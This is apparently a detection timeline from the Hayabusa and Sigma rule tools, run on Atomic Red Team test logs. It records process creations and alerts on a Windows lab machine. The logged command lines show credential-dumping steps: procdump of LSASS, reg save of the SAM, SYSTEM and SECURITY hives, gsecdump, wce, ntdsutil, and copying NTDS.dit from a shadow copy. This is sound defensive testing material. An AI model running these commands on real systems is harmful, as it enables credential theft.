2019-07-19 23:57:54.099 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1300 | PGUID: 747F3D96-DA72-5D31-0000-0010044F3F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:54.129 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | Process: C:\Windows\System32\forfiles.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe"" | LID: 0x50951 | PID: 3680 | PGUID: 747F3D96-DA72-5D31-0000-001056513F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,low,Evas,Indirect Command Execution,,rules/sigma/process_creation/proc_creation_win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | LID: 0x50951 | PID: 3160 | PGUID: 747F3D96-DA72-5D31-0000-0010B1543F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:55.069 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1052 | PGUID: 747F3D96-DA73-5D31-0000-00106A8D3F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:55.138 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c c:\folder\normal.dll:evil.exe | Process: C:\Windows\System32\forfiles.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe | LID: 0x50951 | PID: 4092 | PGUID: 747F3D96-DA73-5D31-0000-0010918F3F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:55.236 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1724 | PGUID: 747F3D96-DA73-5D31-0000-001061933F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:58.359 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49734 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:58.359 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:09:40.973 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 4516 288 0000023C0CA1FA70 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3496 | PGUID: 747F3D96-DD34-5D31-0000-0010FCC64800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:09:43.329 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x50951 | PID: 5632 | PGUID: 747F3D96-DD37-5D31-0000-00109D4C4900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x50951 | PID: 5840 | PGUID: 747F3D96-DD47-5D31-0000-001015874900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:10:52.700 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:10:52.700 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\3ivx11ib\3ivx11ib.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 5840 | PGUID: 747F3D96-DD47-5D31-0000-001015874900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /user | Process: C:\Windows\System32\whoami.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5792 | PGUID: 747F3D96-DD8B-5D31-0000-001094584A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:08.184 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49744 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 5840 | PGUID: 747F3D96-DD47-5D31-0000-001015874900,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:08.184 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 5840 | Src PGUID: 747F3D96-DD47-5D31-0000-001015874900 | Tgt PID: 612 | Tgt PGUID: 747F3D96-D4A4-5D31-0000-00104A560000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:16.986 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""gsecdump -a"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3920 | PGUID: 747F3D96-DD94-5D31-0000-0010F4864A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:17.027 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5476 | PGUID: 747F3D96-DD95-5D31-0000-0010148A4A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:17.107 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wce -o output.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5216 | PGUID: 747F3D96-DD95-5D31-0000-0010B38E4A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:17.149 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6264 | PGUID: 747F3D96-DD95-5D31-0000-0010D6914A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:17.224 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7140 | PGUID: 747F3D96-DD95-5D31-0000-001075964A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:17.224 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:17.243 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\sam sam | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam"" | LID: 0x50951 | PID: 868 | PGUID: 747F3D96-DD95-5D31-0000-0010C7984A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:17.243 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:21.090 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4080 | PGUID: 747F3D96-DD99-5D31-0000-001069A34A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:21.090 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:21.105 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\system system | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system"" | LID: 0x50951 | PID: 1136 | PGUID: 747F3D96-DD99-5D31-0000-0010BBA54A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:21.105 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:23.317 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7164 | PGUID: 747F3D96-DD9B-5D31-0000-00106C1C4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:23.317 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:23.336 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\security security | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security"" | LID: 0x50951 | PID: 4464 | PGUID: 747F3D96-DD9B-5D31-0000-0010BE1E4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:23.336 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.549 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3016 | PGUID: 747F3D96-DD9E-5D31-0000-0010CB274B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Evas | CredAccess,Suspicious Use of Procdump on LSASS,,rules/sigma/process_creation/proc_creation_win_susp_procdump_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5488 | PGUID: 747F3D96-DD9E-5D31-0000-00106E2C4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Evas,Renamed ProcDump,,rules/sigma/process_creation/proc_creation_win_renamed_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Use of Procdump,,rules/sigma/process_creation/proc_creation_win_susp_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,low,ResDev,Usage of Sysinternals Tools,,rules/sigma/process_creation/proc_creation_win_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,medium,Evas,Procdump Usage,,rules/sigma/process_creation/proc_creation_win_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,CredAccess,LSASS Memory Dumping,,rules/sigma/process_creation/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.686 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 264 | PGUID: 747F3D96-DD9E-5D31-0000-00109A2F4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.852 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""ntdsutil “ac i ntds” “ifm” “create full C:\Atomic_Red_Team q q"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 584 | PGUID: 747F3D96-DD9E-5D31-0000-001059374B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.852 +09:00,MSEDGEWIN10,1,high,Evas,Obfuscated Command Line Using Special Unicode Characters,,rules/sigma/process_creation/proc_creation_win_susp_char_in_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.884 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4208 | PGUID: 747F3D96-DD9E-5D31-0000-00106D3A4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.971 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5036 | PGUID: 747F3D96-DD9E-5D31-0000-00100C3F4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,medium,CredAccess,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/proc_creation_win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: vssadmin.exe create shadow /for=C: | Process: C:\Windows\System32\vssadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:"" | LID: 0x50951 | PID: 6584 | PGUID: 747F3D96-DD9E-5D31-0000-00105E414B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.082 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3344 | PGUID: 747F3D96-DD9F-5D31-0000-00107B454B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5772 | PGUID: 747F3D96-DD9F-5D31-0000-00101A4A4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,high,CredAccess,Copying Sensitive Files with Credential Data,,rules/sigma/process_creation/proc_creation_win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 976 | PGUID: 747F3D96-DD9F-5D31-0000-00102D4D4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,high,CredAccess,Copying Sensitive Files with Credential Data,,rules/sigma/process_creation/proc_creation_win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,rules/sigma/process_creation/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.233 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6508 | PGUID: 747F3D96-DD9F-5D31-0000-001041504B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.233 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.258 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE"" | LID: 0x50951 | PID: 6536 | PGUID: 747F3D96-DD9F-5D31-0000-00108D524B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
